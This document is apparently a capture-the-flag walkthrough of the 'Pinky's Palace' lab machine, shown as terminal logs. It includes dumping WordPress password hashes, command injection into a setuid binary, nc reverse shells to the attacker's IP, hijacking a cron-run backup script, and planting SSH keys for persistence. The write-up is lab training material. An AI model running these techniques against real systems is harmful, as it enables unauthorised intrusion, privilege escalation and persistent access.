root        473  0.0  0.0  14536  1792 tty1     Ss+  12:46   0:00 /sbin/agetty --noclear tty1 linux
root        481  0.0  0.3  69944  6252 ?        Ss   12:46   0:00 /usr/sbin/sshd -D
root        504  0.0  0.0 159504  1680 ?        Ss   12:46   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root        507  0.0  1.2 275792 25800 ?        Ss   12:46   0:00 /usr/sbin/apache2 -k start
root        515  0.0  0.0  20472  1044 ?        Ss   12:46   0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens33.pid -lf /var/lib/dhcp/dhclient.ens33.leases -I -df /var/lib/dhcp/dhclient6.ens33.leases ens33
root        534  0.0  0.1   8572  3992 ?        Ss   12:46   0:00 /usr/sbin/knockd -i ens33
root        933  0.0  0.0      0     0 ?        S    13:39   0:00 [kworker/1:0]
root        972  0.0  0.0   4040    84 ?        S    13:53   0:00 /daemon/panel
root       1063  0.0  0.0      0     0 ?        S    14:09   0:00 [kworker/1:2]
root       1209  0.0  0.0      0     0 ?        S    14:39   0:00 [kworker/u256:2]
root       1211  0.0  0.0      0     0 ?        S    14:39   0:00 [kworker/0:1]
root       1247  0.0  0.3  95172  6884 ?        Ss   15:03   0:00 sshd: stefano [priv]
root       1374  0.0  0.0      0     0 ?        S    15:09   0:00 [kworker/u256:0]
root       1376  0.0  0.0      0     0 ?        S    15:09   0:00 [kworker/0:0]
stefano    1425  0.0  0.0  12784   984 pts/0    S+   15:12   0:00 grep roo

[email protected]:/$ mysql -u pinkywp -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45006
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> connect pwp_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Connection id:    45007
Current database: pwp_db

MariaDB [pwp_db]> show tables;
+-----------------------+
| Tables_in_pwp_db      |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

MariaDB [pwp_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | pinky1337  | $P$BqBoittC5WZl0XUL8GVKO1t9R6HcJU/ | pinky1337     | [email protected] |          | 2018-03-17 22:58:07 |                     |           0 | pinky1337    |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

# Meh even if I crack it, I doubt it's re-used

[email protected]:/$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[email protected]:/$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.2.23 40624 192.168.2.24 4655
LANG=en_US.UTF-8
XDG_SESSION_ID=34
USER=stefano
PWD=/
HOME=/home/stefano
SSH_CLIENT=192.168.2.23 40624 4655
SSH_TTY=/dev/pts/0
MAIL=/var/mail/stefano
SHELL=/bin/bash
TERM=xterm-256color
SHLVL=2
LOGNAME=stefano
XDG_RUNTIME_DIR=/run/user/1002
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
OLDPWD=/tmp

[email protected]:/etc$ ls -al | grep cron
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.d
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.daily
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.hourly
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.monthly
-rw-r--r--  1 root root     722 May  3  2015 crontab
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.weekly

[email protected]:/etc$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

I noticed that the suid file is owned by www-data, and in history the lad ran strings on it which may be a hint:
14
Okay…

Let’s try to get a closer look:

$ curl http://pinkydb:7654/pageegap.php?1337=/home/stefano/tools/qsub --output qsub                                                                                            23 ⨯
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13384    0 13384    0     0  12.7M      0 --:--:-- --:--:-- --:--:-- 12.7M

$ strings qsub                                                                                                                                                             127 ⨯
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
__isoc99_scanf
puts
strlen
send
setresgid
asprintf
getenv
setresuid
system
getegid
geteuid
__cxa_finalize
strcmp
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.7
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
/bin/echo %s >> /home/pinky/messages/stefano_msg.txt
%s <Message>
TERM
[+] Input Password: 
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
qsub.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
[email protected]@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
_edata
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__data_start
[email protected]@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
[email protected]@GLIBC_2.2.5
__bss_start
[email protected]@GLIBC_2.2.5
main
_Jv_RegisterClasses
[email protected]@GLIBC_2.7
[email protected]@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
[email protected]@GLIBC_2.2.5
send
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

I think this section is strange, why is TERM there? This is where I’d expect to see a comparason string for matching the password?

TERM
[+] Input Password: 
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l
[+] Input Password: $TERM
[!] Incorrect Password!
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ echo $TERM
xterm-256color
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l  
[+] Input Password: t
[!] Incorrect Password!
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l
[+] Input Password: xterm-256color
sh: 1: cannot create /home/pinky/messages/stefano_msg.txt: Directory nonexistent
[+] Welcome to Question Submit!

HA! Okay, back on the system:

[email protected]:~/tools$ ./qsub  hi
[+] Input Password: xterm-256color
[+] Welcome to Question Submit!

[email protected]:~/tools$ ./qsub  'hi;id'
[+] Input Password: xterm-256color
hi
[+] Welcome to Question Submit!

$ ./qsub  'hi;/bin/id'
[+] Input Password: xterm-256color
hi
sh: 1: /bin/id: not found
[+] Welcome to Question Submit!

[email protected]:~/tools$ TERM=1
[email protected]:~/tools$ ./qsub 'hi;nc -e /bin/sh 192.168.2.23 4444'
[+] Input Password: 1
hi

$ nc -lvp 4444
listening on [any] 4444 ...
ls
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39386
note.txt
qsub
ls
note.txt
qsub
id
uid=1000(pinky) gid=1002(stefano) groups=1002(stefano)
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~/tools$ cd /home/pinky
cd /home/pinky
[email protected]:/home/pinky$ cd .ssh
cd .ssh
bash: cd: .ssh: No such file or directory
[email protected]:/home/pinky$ mkdir .ssh
mkdir .ssh
[email protected]:/home/pinky$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOWct6VtfWUebAnnE3B3Fzg4Lo/s+exeDied0x1L/aOQuHlx90FaE1b6BzcTa7inViJE+xDF6Q4D/pxxfO5dYt+EptFjQInuXswfeH2mSVQGB6dJAxETRP7u7lrtIgyssu8LjFFsnvYKhB1IcJiYqNoBcisD70Zo8iBMPWLhNshpoOSpxsH1UQsXA2LBF9VYlGqj0/0jE1VJQecPOZp6pjOAdtINLQNy4PCLOvZY0c9034PjEdH2veBVrAEGNHPP+SYOU4nHRhgQKCxXf8MqO62V7mQEsTD8jKcBr8MWlRFxi7rtoSV7kXss+/Aa+GW+DxVCWf9TZ7nHZYp14uDtEukvjamHahx30jkKDNkX9PSPu6fHekkhc3iP0qVYcoQJtvwYxF2W2DucDrtTJ6cxVL/SvrTXtxchcnQono08yVyBJhmsNs3Ax77lp2f1Z384ojruz+SZsueJKYnt5BCZJfuarr/qpLEVnq41tfJrHpRn8aN/8mprn4gO/JrWunC+k= [email protected]" > .ssh/authorized_keys


$ ssh [email protected] -p 4655                        
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law

[email protected]:/$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr----x 1 pinky www-data 13384 Mar 16  2018 /home/stefano/tools/qsub
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 440728 Mar  1  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Mar  2  2018 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 61240 Nov  9  2016 /bin/ping
[email protected]:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/mount
/bin/umount
/bin/ping

# Checl for freq. running processes
$ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

[email protected]:/$ ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
ls: cannot open directory '/root': Permission denied
/tmp:
.   .font-unix  systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-apache2.service-ab0Nbk            .Test-unix  .XIM-unix
..  .ICE-unix   systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-systemd-timesyncd.service-t8NO6G  .X11-unix

/var/backups:
.  ..  apt.extended_states.0  apt.extended_states.1.gz  apt.extended_states.2.gz

/var/mail/:
.  ..

/var/spool/mail/:
.  ..

/var/tmp:
.                                                                                  systemd-private-6b6650cce3004c3a88a3ee2f01e9b905-apache2.service-pKdoMx
..                                                                                 systemd-private-6b6650cce3004c3a88a3ee2f01e9b905-systemd-timesyncd.service-ZYxtKl
systemd-private-111e24c66f054200859d5b81c67004e2-apache2.service-SIDlJO            systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-apache2.service-EzPs68
systemd-private-111e24c66f054200859d5b81c67004e2-systemd-timesyncd.service-XswiwR  systemd-private-b2b205f6d25d4b4eab4f4d46936996c3-systemd-timesyncd.service-47W9gv
systemd-private-566e8eddd2a64ec28a14ce4a1f7f3f27-apache2.service-CoyyTQ            systemd-private-cb424d60f9454a59941e2f0144725b2c-apache2.service-f88UiV
systemd-private-566e8eddd2a64ec28a14ce4a1f7f3f27-systemd-timesyncd.service-S11NGS  systemd-private-cb424d60f9454a59941e2f0144725b2c-systemd-timesyncd.service-upDzUm

# Writable files by each group I belong to
[email protected]:/$ for g in `groups`;
>       do printf "  Group $g:\n";
>       find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
>       done
  Group pinky:
/usr/local/bin/backup.sh
  Group cdrom:
  Group floppy:
  Group audio:
  Group dip:
  Group video:
  Group plugdev:
  Group netdev:

$ cat /usr/local/bin/backup.sh
#!/bin/bash

rm /home/demon/backups/backup.tar.gz
tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
#
#
#

[email protected]:/$ ls -al /usr/local/bin/backup.sh
-rwxrwx--- 1 demon pinky 113 Mar 17  2018 /usr/local/bin/backup.sh

I’m not sure if anything is actually executing this script… but I changed it to:

#!/bin/bash
nc -e /bin/sh 192.168.2.23 4444
#rm /home/demon/backups/backup.tar.gz
#tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
#
#
#

And left a listener running.. a few seconds later:

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39388
id
uid=1001(demon) gid=1001(demon) groups=1001(demon)
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~$ ls -al
ls -al
total 24
drwxr-x--- 3 demon demon 4096 Mar 17  2018 .
drwxr-xr-x 5 root  root  4096 Mar 17  2018 ..
drwxr-xr-x 2 demon demon 4096 Mar  1 16:30 backups
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .bash_history -> /dev/null
-rw-r--r-- 1 demon demon  220 May 15  2017 .bash_logout
-rw-r--r-- 1 demon demon 3526 May 15  2017 .bashrc
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .mysql_history -> /dev/null
-rw-r--r-- 1 demon demon  675 May 15  2017 .profile
[email protected]:~$ pwd
pwd
/home/demon
[email protected]:~$ mkdir .ssh
mkdir .ssh
[email protected]:~$  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOWct6VtfWUebAnnE3B3Fzg4Lo/s+exeDied0x1L/aOQuHlx90FaE1b6BzcTa7inViJE+xDF6Q4D/pxxfO5dYt+EptFjQInuXswfeH2mSVQGB6dJAxETRP7u7lrtIgyssu8LjFFsnvYKhB1IcJiYqNoBcisD70Zo8iBMPWLhNshpoOSpxsH1UQsXA2LBF9VYlGqj0/0jE1VJQecPOZp6pjOAdtINLQNy4PCLOvZY0c9034PjEdH2veBVrAEGNHPP+SYOU4nHRhgQKCxXf8MqO62V7mQEsTD8jKcBr8MWlRFxi7rtoSV7kXss+/Aa+GW+DxVCWf9TZ7nHZYp14uDtEukvjamHahx30jkKDNkX9PSPu6fHekkhc3iP0qVYcoQJtvwYxF2W2DucDrtTJ6cxVL/SvrTXtxchcnQono08yVyBJhmsNs3Ax77lp2f1Z384ojruz+SZsueJKYnt5BCZJfuarr/qpLEVnq41tfJrHpRn8aN/8mprn4gO/JrWunC+k= [email protected]" > .ssh/authorized_keys

$ ssh [email protected] -p 4655
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
[email protected]:~$ id
uid=1001(demon) gid=1001(demon) groups=1001(demon)

[email protected]:~$ ls -al
total 28
drwxr-x--- 4 demon demon 4096 Mar  1 16:36 .
drwxr-xr-x 5 root  root  4096 Mar 17  2018 ..
drwxr-xr-x 3 demon demon 4096 Mar  1 16:37 backups
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .bash_history -> /dev/null
-rw-r--r-- 1 demon demon  220 May 15  2017 .bash_logout
-rw-r--r-- 1 demon demon 3526 May 15  2017 .bashrc
lrwxrwxrwx 1 root  root     9 Mar 17  2018 .mysql_history -> /dev/null
-rw-r--r-- 1 demon demon  675 May 15  2017 .profile
drwxr-xr-x 2 demon demon 4096 Mar  1 16:36 .ssh

[email protected]:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.2.23 40708 192.168.2.24 4655
LANG=en_US.UTF-8
XDG_SESSION_ID=64
USER=demon
PWD=/home/demon
HOME=/home/demon
SSH_CLIENT=192.168.2.23 40708 4655
SSH_TTY=/dev/pts/1
MAIL=/var/mail/demon
TERM=xterm-256color
SHELL=/bin/bash
SHLVL=1
LOGNAME=demon
XDG_RUNTIME_DIR=/run/user/1001
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
OLDPWD=/

[email protected]:/$ find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
/dev/mqueue
/dev/shm
/tmp
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/daemon
/daemon/panel
/var/tmp
/var/www/html/apache/wp-config.php
/var/lib/php/sessions
/home/demon
/usr/local/bin/backup.sh
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/lock

$ cd /daemon
$ ./panel
...
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
[-] binding to socket
...


strings panel
/lib64/ld-linux-x86-64.so.2
d.jb
libc.so.6
socket
strcpy
exit
htons
wait
fork
listen
printf
strlen
send
memset
bind
recv
setsockopt
close
accept
__libc_start_main
__gmon_start__
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
[-] %s
[-] Fail in socket
setting sock options
binding to socket
listening
new sock failed
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
panel.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
_edata
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
handlecmd
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
[email protected]@GLIBC_2.2.5
__bss_start
main
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__TMC_END__
fatal
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment

Oh hmm… this looks like it may be that backdoor thing on 31337 that I ended up ignoring, probably don’t need this vector anymore eh?

[email protected]:/daemon$ ps -aux | grep daemon
message+    448  0.0  0.1  45116  3808 ?        Ss   12:46   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        468  0.0  0.0   4040   988 ?        Ss   12:46   0:00 /daemon/panel
root        504  0.0  0.0 159504  1680 ?        Ss   12:46   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root        972  0.0  0.0   4040    84 ?        S    13:53   0:00 /daemon/panel
demon     43334  0.0  0.0  12784   996 pts/1    S+   17:46   0:00 grep daemon

Yeah no, I need to figure out how to pop a shell with that god damn binary. I hate binary analysis honestly. Ohhhh well, here we go!

# Download a copy onto my host
[email protected]:/daemon$ pwd
/daemon
[email protected]:/daemon$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.2.23 - - [01/Mar/2021 17:49:38] "GET /panel HTTP/1.1" 200 -

$ wget 192.168.2.24:8000/panel 
--2021-03-01 20:49:56--  http://192.168.2.24:8000/panel
Connecting to 192.168.2.24:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13280 (13K) [application/octet-stream]
Saving to: ‘panel’

panel                                         100%[===============================================================================================>]  12.97K  --.-KB/s    in 0s      

2021-03-01 20:49:56 (180 MB/s) - ‘panel’ saved [13280/13280]

$ chmod +x panel && ./panel
... hangs ...

# Check if we can overflow the stack easily
$ readelf -a ./panel | grep -i -A3 stack 
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RWE    0x10
  GNU_RELRO      0x0000000000001e08 0x0000000000601e08 0x0000000000601e08
                 0x00000000000001f8 0x00000000000001f8  R      0x1

# We can...
# Let's find the code handling the command that we saw just echo back at us before
$ readelf -a ./panel | grep FUNC        
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
    14: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
    17: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [email protected]_2.2.5 (2)
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND [...]@GLIBC_2.2.5 (2)
    29: 0000000000400870     0 FUNC    LOCAL  DEFAULT   13 deregister_tm_clones
    30: 00000000004008b0     0 FUNC    LOCAL  DEFAULT   13 register_tm_clones
    31: 00000000004008f0     0 FUNC    LOCAL  DEFAULT   13 __do_global_dtors_aux
    34: 0000000000400910     0 FUNC    LOCAL  DEFAULT   13 frame_dummy
